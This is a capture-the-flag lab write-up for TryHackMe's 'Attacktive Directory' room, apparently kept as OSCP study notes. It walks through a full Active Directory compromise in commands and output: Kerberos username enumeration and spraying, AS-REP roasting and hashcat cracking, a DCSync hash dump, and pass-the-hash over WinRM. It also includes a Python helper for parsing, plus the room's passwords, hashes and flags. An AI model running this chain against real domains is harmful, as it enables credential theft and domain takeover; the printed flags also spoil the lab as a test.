THM Attacktive Directory done
Attacktive_Directory
OS:
Windows
Technology:
Active Directory
IP Address:
10.10.81.207 (the room was redeployed during the write-up, so later commands target 10.10.109.182 and 10.10.119.11)
Open ports:
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-26 05:10:05Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check flagged this listener (rest of the script output truncated in these notes)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check flagged this listener (rest of the script output truncated in these notes)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Users and passwords:
LOCAL ACCOUNTS (from enum4linux; THM-AD is the domain NetBIOS name, ATTACKTIVEDIREC the DC hostname):
THM-AD\Administrator
THM-AD\Guest
THM-AD\krbtgt
THM-AD\ATTACKTIVEDIREC$
ATTACKTIVEDIREC\Administrator
ATTACKTIVEDIREC\Guest
ATTACKTIVEDIREC\DefaultAccount
ATTACKTIVEDIREC\WDAGUtilityAccount
USERS (validated with kerbrute; 16 accounts, whose names were replaced by "[email protected]" when this copy of the notes was extracted):
[email protected]
CREDS:
svc-admin
management2005
---
backup
backup2517860
Nmap
sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.109.182_nmap_vulns 10.10.109.182
Enum4Linux (spookysec.local has to resolve first, e.g. via an /etc/hosts entry pointing at the target IP)
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ enum4linux -aA spookysec.local | tee spookysec.local_enum4linux
Get the local usernames from the enum4linux output
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ cat spookysec.local_enum4linux | grep -i "Local User" | awk '{print $2}'
THM-AD\Administrator
THM-AD\Guest
THM-AD\krbtgt
THM-AD\ATTACKTIVEDIREC$
ATTACKTIVEDIREC\Administrator
ATTACKTIVEDIREC\Guest
ATTACKTIVEDIREC\DefaultAccount
ATTACKTIVEDIREC\WDAGUtilityAccount
Download username and password list
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt ; wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
--2023-03-02 13:10:08-- https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 540470 (528K) [text/plain]
Saving to: ‘userlist.txt’
userlist.txt 100%[==============================================>] 527.80K 1.15MB/s in 0.4s
2023-03-02 13:10:09 (1.15 MB/s) - ‘userlist.txt’ saved [540470/540470]
--2023-03-02 13:10:09-- https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569236 (556K) [text/plain]
Saving to: ‘passwordlist.txt’
passwordlist.txt 100%[==============================================>] 555.89K 3.10MB/s in 0.2s
2023-03-02 13:10:09 (3.10 MB/s) - ‘passwordlist.txt’ saved [569236/569236]
Enumerate valid usernames - kerbrute (the KDC answers an AS-REQ for an unknown principal with a different error than for an existing one, so valid names can be confirmed without a password; note that -passwords additionally sprays every password against every user, which counts against the lockout threshold, so omit it when you only want enumeration)
python kerbrute/kerbrute.py -users userlist.txt -passwords passwordlist.txt -domain spookysec.local -outputfile 10.10.109.182_kerbrute
Extract the valid usernames from the kerbrute output
cat 10.10.109.182_kerbrute | grep VALID | awk -F "@" '{print $1}' | awk '{print $NF}' > 10.10.109.182_kerbrute_users
AS-REP roasting: request a TGT for each valid user with -no-pass. Accounts with DONT_REQUIRE_PREAUTH set return an AS-REP whose encrypted part is derived from the user's password and can be cracked offline; the others fail as shown for james. (GetNPUsers also takes -usersfile and -format hashcat, which does the same in one call instead of a loop.)
└─$ while read -r line; do python3 /home/kali/.local/bin/GetNPUsers.py spookysec.local/$line -no-pass ; done < 10.10.109.182_kerbrute_users | tee kerberos_ticket
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for james
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:6c0ee7713fde0c03e8eeac98695c7c06$cd64ff3269c9c364c807cbbf128e236a49c88df966c85ff1b9a1e3d9aaaded06693e27864bd40020d4e1f79a04c7f94265c5f60dbd15fefbcf245725c10c7b9322be09f93682935d1b3ef20c3230237ee34e16f3617855f60b51ed1bf1c57be75923ae7ca539250e07ad239c28a79cdd91b5207491271f1be5ed9585eae85f83b85383e2d6ec47c96e9f8f6e278d3876fe2727d95a1a560b5205971caa71bc2c1594f36f0cf66018237909853ac742731e140f33cf3e1c8e308e427c21e15c91db0cc5d927c9e2971887be1803e649a94fbad8ba4f02bc0e7916e8a888a46b21c7bc411a13fc2eb5959acd0a5c0f02aa2521
Cracking the AS-REP hash with hashcat mode 18200 (Kerberos 5 AS-REP, etype 23 / RC4-HMAC). hashcat wants a file containing only hash lines, so the $krb5asrep$ line has to be copied out of kerberos_ticket (here into kerberos_ticket_john) without the Impacket banner and progress lines.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ hashcat -m18200 kerberos_ticket_john /tmp/rockyou.txt
...
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:6c0ee7713fde0c03e8eeac98695c7c06$cd64ff3269c9c364c807cbbf128e236a49c88df966c85ff1b9a1e3d9aaaded06693e27864bd40020d4e1f79a04c7f94265c5f60dbd15fefbcf245725c10c7b9322be09f93682935d1b3ef20c3230237ee34e16f3617855f60b51ed1bf1c57be75923ae7ca539250e07ad239c28a79cdd91b5207491271f1be5ed9585eae85f83b85383e2d6ec47c96e9f8f6e278d3876fe2727d95a1a560b5205971caa71bc2c1594f36f0cf66018237909853ac742731e140f33cf3e1c8e308e427c21e15c91db0cc5d927c9e2971887be1803e649a94fbad8ba4f02bc0e7916e8a888a46b21c7bc411a13fc2eb5959acd0a5c0f02aa2521:management2005
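The kerbrute → GetNPUsers → hashcat hand-off above is done with grep/awk, which drops the realm but also truncates any trailing "[NOT PREAUTH]" marker and leaves the Impacket banner in the hash file. The following is an added example for these notes (not code from the write-up, from kerbrute or from Impacket) that does the same hand-off with explicit parsing and sanity checks. The kerbrute line layout it expects ("[*] Valid user => user[@realm] [NOT PREAUTH]") is an assumption about that tool's output, and all sample lines are constructed: the AS-REP sample uses svc-admin's real checksum from this page but a shortened dummy enc-part.

```python
"""Post-processing helpers for the AS-REP roasting steps in these notes.

Added example, not part of the original write-up, kerbrute or Impacket.
Sample lines are constructed to mirror the formats seen on this page.
"""
import re

# kerbrute "Valid user" lines. Layout assumed: "[*] Valid user => <user>[@<realm>]"
# with an optional "[NOT PREAUTH]" marker for accounts without pre-auth.
_KERBRUTE_VALID = re.compile(
    r"Valid user => (?P<user>[^@\s]+)(?:@(?P<realm>\S+))?"
    r"(?P<nopreauth>\s+\[NOT PREAUTH\])?"
)

# hashcat -m 18200 / GetNPUsers -format hashcat layout:
#   $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex enc-part>
_ASREP = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_kerbrute(lines):
    """Map each valid username to True if it still requires pre-auth.

    Users mapped to False are the AS-REP roasting candidates.
    """
    users = {}
    for line in lines:
        m = _KERBRUTE_VALID.search(line)
        if m:
            users[m.group("user")] = m.group("nopreauth") is None
    return users


def roastable_users(lines):
    """Sorted usernames kerbrute marked as not requiring pre-auth."""
    return sorted(u for u, pre in parse_kerbrute(lines).items() if not pre)


def extract_asrep_hashes(lines):
    """Keep only the $krb5asrep$ lines from mixed GetNPUsers output.

    This is the kerberos_ticket -> kerberos_ticket_john step: hashcat rejects
    a file that still contains the banner and "[*] Getting TGT for" lines.
    """
    return [l.strip() for l in lines if l.strip().startswith("$krb5asrep$")]


def parse_asrep_hash(line):
    """Split an AS-REP hash into etype/user/realm/checksum/edata and check it.

    Mode 18200 is RC4-HMAC (etype 23) only; AES AS-REPs (etype 17/18) need
    hashcat modes 32100/32200, so those are rejected here with a hint.
    """
    m = _ASREP.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    f = m.groupdict()
    f["etype"] = int(f["etype"])
    if f["etype"] != 23:
        raise ValueError(f"etype {f['etype']} is not RC4-HMAC; use mode 32100/32200")
    if len(f["edata"]) % 2:
        raise ValueError("enc-part hex has odd length; line is truncated")
    return f


# Constructed sample data modelled on the output shown in these notes.
KERBRUTE_SAMPLE = [
    "[*] Valid user => james",
    "[*] Valid user => svc-admin [NOT PREAUTH]",
    "[*] Valid user => backup@spookysec.local",
]
GETNPUSERS_SAMPLE = [
    "Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation",
    "[*] Getting TGT for james",
    "[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set",
    "[*] Getting TGT for svc-admin",
    # real checksum from the page, enc-part shortened to a dummy value
    "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:6c0ee7713fde0c03e8eeac98695c7c06$cd64ff3269c9c364c807cbbf128e236a",
]

if __name__ == "__main__":
    print("roastable:", roastable_users(KERBRUTE_SAMPLE))
    for h in extract_asrep_hashes(GETNPUSERS_SAMPLE):
        f = parse_asrep_hash(h)
        print(f"{f['user']}@{f['realm']} etype={f['etype']} checksum={f['checksum']}")
```

Feed the real files in place of the sample lists (`open("10.10.109.182_kerbrute")` and `open("kerberos_ticket")`), then write the output of `extract_asrep_hashes` to the file you pass to `hashcat -m 18200`.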
List SMB shares as svc-admin (the non-default backup share is the lead)
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ smbclient -L \\spookysec.local -U spookysec.local/svc-admin
Password for [SPOOKYSEC.LOCAL\svc-admin]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
List all files from backup share
└─$ smbclient \\\\spookysec.local\\backup -U spookysec.local/svc-admin
Password for [SPOOKYSEC.LOCAL\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3634856 blocks available
smb: \>
Get file from backup share
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decode backup_credentials.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860
Dump all domain hashes with the backup account (DCSync). -just-dc pulls the NTDS secrets through the directory replication service (DRSUAPI), which only succeeds because backup holds the replication extended rights on the domain object; that is the privilege escalation here. Add -just-dc-ntlm to skip the Kerberos keys, or -user-status to see which of the dumped accounts are disabled.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ /home/kali/.local/bin/secretsdump.py -just-dc backup@spookysec.local | tee dump_domain_hashes
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
...
Flags for users Administrator, backup and svc-admin, read over WinRM with pass-the-hash: evil-winrm -H takes the Administrator NT hash from the dump directly, so the hash never has to be cracked.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacktive_Directory]
└─$ evil-winrm -i 10.10.119.11 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\svc-admin\Desktop\user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\backup\Desktop\PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}